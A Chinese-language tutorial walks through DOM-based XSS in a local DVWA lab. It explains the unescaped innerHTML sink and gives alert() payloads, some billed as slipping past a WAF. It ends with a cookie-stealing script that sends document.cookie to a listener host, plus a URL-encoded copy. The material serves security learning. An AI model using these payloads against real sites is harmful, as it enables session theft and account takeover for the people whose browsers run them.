DOM-Based XSS(基于文档对象模型的跨站脚本攻击)

✅ 一、什么是 DOM XSS?

DOM XSS 是一种发生在浏览器端 JavaScript 中的漏洞,攻击者通过修改页面 URL 参数,使页面的 JS 脚本在未经清洗的情况下处理了恶意内容。

与反射型/存储型不同,DOM XSS 不依赖服务器端返回,而是浏览器前端脚本自己"造出来的洞"。

🧪 二、练习环境:DVWA > XSS (DOM)

  • 拉取 DVWA 镜像并运行:docker run --rm -it -p 8080:80 vulnerables/web-dvwa
  • 打开 DVWA 中的:

XSS (DOM) 页面

你可以在地址栏看到类似:

http://localhost:8080/vulnerabilities/xss_d/?default=English

🔥 三、构造攻击 payload

在 URL 参数 default 中注入恶意 JS:

示例 1:弹窗测试

将 URL 改为:

bash 复制代码
http://localhost:8080/vulnerabilities/xss_d/?default=<script>alert('XSS')</script>

如果弹窗生效,你就成功执行了 DOM XSS。

🧠 四、为什么会生效?

在查看网页源代码(Ctrl+U 或 F12)后,你会看到类似:

bash 复制代码
<script>
  var language = document.URL.split('default=')[1];
  document.getElementById("language").innerHTML = language;
</script>

这个 JS 没有对 language 内容进行任何转义或编码,直接将 URL 中的参数插入了 HTML 页面中,这就构成了 DOM XSS。

🛠️ 五、其他测试 payload(不触发 WAF)

隐形脚本:

bash 复制代码
"><script>alert(1)</script>

使用 onerror:

bash 复制代码
<img src=x onerror=alert('XSS')>

放在 URL 参数里:

bash 复制代码
http://localhost:8080/vulnerabilities/xss_d/?default=<img src=x onerror=alert('XSS')>
bash 复制代码
🎯 六、扩展测试:窃取 Cookie

如果你已经搭建了监听服务:

bash 复制代码
<script>
  new Image().src="http://192.168.220.128:8081/log?c=" + document.cookie;
</script>

URL 编码后放入:

bash 复制代码
http://localhost:8080/vulnerabilities/xss_d/?default=%3Cscript%3Enew%20Image().src%3D%22http%3A//192.168.220.128:8081/log%3Fc%3D%22%2Bdocument.cookie%3C/script%3E
相关推荐
介一安全2 天前
【Web安全】OAuth2.0框架高频安全漏洞分析总结
web安全·网络安全·安全性测试
汽车仪器仪表相关领域2 天前
工业商业安全 “哨兵”:GT-NHVR-20-A1 点型可燃气体探测器实操解析与场景适配
大数据·人工智能·功能测试·安全·安全性测试
红树林073 天前
beef-xss网页无法访问
安全·web安全·xss
介一安全4 天前
【Frida Android】基础篇12:Native层hook基础——调用原生函数
android·网络安全·逆向·安全性测试·frida·1024程序员节
xixixi777774 天前
怎么区分主动攻击和被动攻击啊,为什么跨站脚本是被动攻击?
xss·1024程序员节·跨站脚本·主动攻击·被动攻击
骥龙4 天前
2.6、Web漏洞挖掘实战(下):XSS、文件上传与逻辑漏洞深度解析
前端·xss
-曾牛6 天前
从零到一:XSS靶场 haozi.me 全关卡通关教程(含冷知识汇总)
前端·网络安全·渗透测试·靶场·xss·攻略·靶场教程
无盐海6 天前
XSS漏洞攻击 (跨站脚本攻击)
前端·xss
Forfun_tt6 天前
xss-labs pass-12
前端·xss
网络安全-海哥6 天前
Web安全深度实战:从漏洞原理到防护方案
sql·web安全·网络安全·xss·csrf·漏洞挖掘·安全防护